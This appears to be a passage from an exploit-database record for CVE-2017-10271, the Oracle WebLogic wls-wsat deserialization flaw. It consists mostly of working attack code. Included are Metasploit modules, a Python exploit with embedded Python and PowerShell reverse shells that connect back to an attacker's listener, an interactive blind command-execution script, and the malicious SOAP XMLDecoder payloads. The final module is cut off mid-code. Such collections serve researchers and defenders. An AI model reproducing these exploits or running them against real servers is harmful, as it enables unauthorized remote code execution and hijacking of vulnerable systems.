parser.add_argument(\n '-w',\n '--win',\n dest='windows',\n action='store_true',\n help=\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\n )\n\n args = parser.parse_args()\n\n exploit = Exploit(\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\n windows=args.windows)\n exploit.run()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2018-01-29T00:20:57", "description": "", "published": "2018-01-28T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2018-01-28T00:00:00", "id": "PACKETSTORM:146143", "href": "https://packetstormsecurity.com/files/146143/Oracle-WebLogic-wls-wsat-Component-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n# include Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', \n'Description' => %q( \nThe Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization \nremote code execution vulnerability. Supported versions that are affected are \n10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin \nof ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, \nHTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check \nand will not be used when executing the exploit itself. \n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module \n'Luffin', # Proof of Concept \n'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery \n], \n'References' => \n[ \n['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin \n['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept \n['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit \n['CVE', '2017-10271'], \n['EDB', '43458'] \n], \n'Platform' => %w{ win unix }, \n'Arch' => [ ARCH_CMD ], \n'Targets' => \n[ \n[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], \n[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] \n], \n'DisclosureDate' => \"Oct 19 2017\", \n# Note that this is by index, rather than name. It's generally easiest \n# just to put the default at the beginning of the list and skip this \n# entirely. \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), \nOptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]), \nOptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]), \n# OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) \n]) \nend \n \ndef cmd_base \nif target['Platform'] == 'win' \nreturn 'cmd' \nelse \nreturn '/bin/sh' \nend \nend \n \ndef cmd_opt \nif target['Platform'] == 'win' \nreturn '/c' \nelse \nreturn '-c' \nend \nend \n \n \n# \n# This generates a XML payload that will execute the desired payload on the RHOST \n# \ndef exploit_process_builder_payload \n# Generate a payload which will execute on a *nix machine using /bin/sh \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java> \n<void class=\"java.lang.ProcessBuilder\"> \n<array class=\"java.lang.String\" length=\"3\" > \n<void index=\"0\"> \n<string>#{cmd_base}</string> \n</void> \n<void index=\"1\"> \n<string>#{cmd_opt}</string> \n</void> \n<void index=\"2\"> \n<string>#{payload.encoded.encode(xml: :text)}</string> \n</void> \n</array> \n<void method=\"start\"/> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# This builds a XML payload that will generate a HTTP GET request to our SRVHOST \n# from the target machine. \n# \ndef check_process_builder_payload \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java version=\"1.8\" class=\"java.beans.XMLDecoder\"> \n<void id=\"url\" class=\"java.net.URL\"> \n<string>#{get_uri.encode(xml: :text)}</string> \n</void> \n<void idref=\"url\"> \n<void id=\"stream\" method = \"openStream\" /> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# In the event that a 'check' host responds, we should respond randomly so that we don't clog up \n# the logs too much with a no response error or similar. \n# \ndef on_request_uri(cli, request) \nrandom_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>' \nsend_response(cli, random_content) \n \n@received_request = true \nend \n \n# \n# The exploit method connects to the remote service and sends a randomly generated string \n# encapsulated within a SOAP XML body. This will start an HTTP server for us to receive \n# the response from. This is based off of the exploit technique from \n# exploits/windows/novell/netiq_pum_eval.rb \n# \n# This doesn't work as is because MSF cannot mix HttpServer and HttpClient \n# at the time of authoring this \n# \n# def check \n# start_service \n# \n# print_status('Sending the check payload...') \n# res = send_request_cgi({ \n# 'method' => 'POST', \n# 'uri' => normalize_uri(target_uri.path), \n# 'data' => check_process_builder_payload, \n# 'ctype' => 'text/xml;charset=UTF-8' \n# }, datastore['TIMEOUT']) \n# \n# print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\") \n# \n# waited = 0 \n# until @received_request \n# sleep 1 \n# waited += 1 \n# if waited > datastore['HTTP_DELAY'] \n# stop_service \n# return Exploit::CheckCode::Safe \n# end \n# end \n# \n# stop_service \n# return Exploit::CheckCode::Vulnerable \n# end \n \n# \n# The exploit method connects to the remote service and sends the specified payload \n# encapsulated within a SOAP XML body. \n# \ndef exploit \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'data' => exploit_process_builder_payload, \n'ctype' => 'text/xml;charset=UTF-8' \n}, datastore['TIMEOUT']) \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146143/oracle_weblogic_wsat_deserialization_rce.rb.txt"}], "exploitdb": [{"lastseen": "2018-01-24T14:18:38", "description": "Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution. CVE-2017-10271. Remote exploit for Multiple platform", "published": "2018-01-03T00:00:00", "type": "exploitdb", "title": "Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2018-01-03T00:00:00", "id": "EDB-ID:43458", "href": "https://www.exploit-db.com/exploits/43458/", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n\r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n\r\nclass Exploit:\r\n\r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n\r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. E.g.\r\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n self.cmd_payload = escape(self.cmd_payload)\r\n\r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n\r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n\r\n\r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n\r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n\r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n\r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n\r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n\r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n\r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n print('[+] Running {target} execute payload').format(target=self.target)\r\n\r\n self.post_exploit(data=payload)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n\r\n args = parser.parse_args()\r\n\r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/43458/"}, {"lastseen": "2018-11-30T12:32:29", "description": "", "published": "2017-12-26T00:00:00", "type": "exploitdb", "title": "Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2017-12-26T00:00:00", "id": "EDB-ID:43392", "href": "https://www.exploit-db.com/exploits/43392", "sourceData": "import requests\r\nimport sys\r\n\r\nurl_in = sys.argv[1]\r\npayload_url = url_in + \"/wls-wsat/CoordinatorPortType\"\r\npayload_header = {'content-type': 'text/xml'}\r\n\r\n\r\ndef payload_command (command_in):\r\n html_escape_table = {\r\n \"&\": \"&\",\r\n '\"': \"\"\",\r\n \"'\": \"'\",\r\n \">\": \">\",\r\n \"<\": \"<\",\r\n }\r\n command_filtered = \"<string>\"+\"\".join(html_escape_table.get(c, c) for c in command_in)+\"</string>\"\r\n payload_1 = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\"> \\n\" \\\r\n \" <soapenv:Header> \" \\\r\n \" <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\"> \\n\" \\\r\n \" <java version=\\\"1.8.0_151\\\" class=\\\"java.beans.XMLDecoder\\\"> \\n\" \\\r\n \" <void class=\\\"java.lang.ProcessBuilder\\\"> \\n\" \\\r\n \" <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\" \\\r\n \" <void index = \\\"0\\\"> \" \\\r\n \" <string>cmd</string> \" \\\r\n \" </void> \" \\\r\n \" <void index = \\\"1\\\"> \" \\\r\n \" <string>/c</string> \" \\\r\n \" </void> \" \\\r\n \" <void index = \\\"2\\\"> \" \\\r\n + command_filtered + \\\r\n \" </void> \" \\\r\n \" </array>\" \\\r\n \" <void method=\\\"start\\\"/>\" \\\r\n \" </void>\" \\\r\n \" </java>\" \\\r\n \" </work:WorkContext>\" \\\r\n \" </soapenv:Header>\" \\\r\n \" <soapenv:Body/>\" \\\r\n \"</soapenv:Envelope>\"\r\n return payload_1\r\n\r\ndef do_post(command_in):\r\n result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)\r\n\r\n if result.status_code == 500:\r\n print \"Command Executed \\n\"\r\n else:\r\n print \"Something Went Wrong \\n\"\r\n\r\n\r\n\r\nprint \"***************************************************** \\n\" \\\r\n \"**************** Coded By 1337g ****************** \\n\" \\\r\n \"* CVE-2017-10271 Blind Remote Command Execute EXP * \\n\" \\\r\n \"***************************************************** \\n\"\r\n\r\nwhile 1:\r\n command_in = raw_input(\"Eneter your command here: \")\r\n if command_in == \"exit\" : exit(0)\r\n do_post(command_in)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/43392"}], "metasploit": [{"lastseen": "2020-10-14T07:49:01", "description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.\n", "published": "2018-01-05T20:05:21", "type": "metasploit", "title": "Oracle WebLogic wls-wsat Component Deserialization RCE", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n # include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\n 'Description' => %q(\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\n 'Luffin', # Proof of Concept\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\n ],\n 'References' =>\n [\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\n ['CVE', '2017-10271'],\n ['EDB', '43458']\n ],\n 'Platform' => %w{ win unix },\n 'Arch' => [ ARCH_CMD ],\n 'Targets' =>\n [\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\n ],\n 'DisclosureDate' => '2017-10-19',\n # Note that this is by index, rather than name. It's generally easiest\n # just to put the default at the beginning of the list and skip this\n # entirely.\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\n ])\n end\n\n def cmd_base\n if target['Platform'] == 'win'\n return 'cmd'\n else\n return '/bin/sh'\n end\n end\n\n def cmd_opt\n if target['Platform'] == 'win'\n return '/c'\n else\n return '-c'\n end\n end\n\n\n #\n # This generates a XML payload that will execute the desired payload on the RHOST\n #\n def exploit_process_builder_payload\n # Generate a payload which will execute on a *nix machine using /bin/sh\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <void class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>#{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>#{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>#{payload.encoded.encode(xml: :text)}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\n # from the target machine.\n #\n def check_process_builder_payload\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <void id=\"url\" class=\"java.net.URL\">\n <string>#{get_uri.encode(xml: :text)}</string>\n </void>\n <void idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\n # the logs too much with a no response error or similar.\n #\n def on_request_uri(cli, request)\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\n send_response(cli, random_content)\n\n @received_request = true\n end\n\n #\n # The exploit method connects to the remote service and sends a randomly generated string\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\n # the response from. This is based off of the exploit technique from\n # exploits/windows/novell/netiq_pum_eval.rb\n #\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\n # at the time of authoring this\n #\n # def check\n # start_service\n #\n # print_status('Sending the check payload...')\n # res = send_request_cgi({\n # 'method' => 'POST',\n # 'uri' => normalize_uri(target_uri.path),\n # 'data' => check_process_builder_payload,\n # 'ctype' => 'text/xml;charset=UTF-8'\n # }, datastore['TIMEOUT'])\n #\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\n #\n # waited = 0\n # until @received_request\n # sleep 1\n # waited += 1\n # if waited > datastore['HTTP_DELAY']\n # stop_service\n # return Exploit::CheckCode::Safe\n # end\n # end\n #\n # stop_service\n # return Exploit::CheckCode::Vulnerable\n # end\n\n #\n # The exploit method connects to the remote service and sends the specified payload\n # encapsulated within a SOAP XML body.\n #\n def exploit\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'data' => exploit_process_builder_payload,\n 'ctype' => 'text/xml;charset=UTF-8'\n }, datastore['TIMEOUT'])\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb"}, {"lastseen": "2020-10-15T08:08:49", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.\n", "published": "2019-04-26T01:03:17", "type": "metasploit", "title": "Oracle Weblogic Server Deserialization RCE - AsyncResponseService", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271", "CVE-2019-2725"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n to execute code on the vulnerable host.\n },\n 'Author' =>\n [\n 'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2017-10271'],\n ['CNVD-C', '2019-48814'],\n ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],\n ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'],\n ['URL', 'https://twitter.com/F5Labs/status/1120822404568244224']\n ],\n 'Privileged' => false,\n 'Platform' => %w{ unix win solaris },\n 'Targets' =>\n [\n [ 'Unix',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}\n ],\n [ 'Windows',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}\n ],\n [ 'Solaris',\n 'Platform' => 'solaris',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},\n 'Payload' => {\n 'Space' => 2048,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet',\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 12\n },\n 'DisclosureDate' => '2019-04-23'))\n\n register_options(\n [\n Opt::RPORT(7001),\n OptString.new('TARGETURI', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'headers' => {'SOAPAction' => '' }\n )\n\n if res && res.code == 500 && res.body.include?(\"<faultcode>env:Client</faultcode>\")\n vprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\")\n vprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\")\n Exploit::CheckCode::Vulnerable\n elsif res && res.code != 202\n vprint_status(\"The target returned a non-vulnerable HTTP code\")\n Exploit::CheckCode::Safe\n elsif res.nil?\n vprint_status(\"The target did not respond in an expected way\")\n Exploit::CheckCode::Unknown\n else\n vprint_status(\"The target returned HTTP code: #{res.code}\")\n vprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\")\n Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n print_status(\"Generating payload...\")\n case target.name\n when 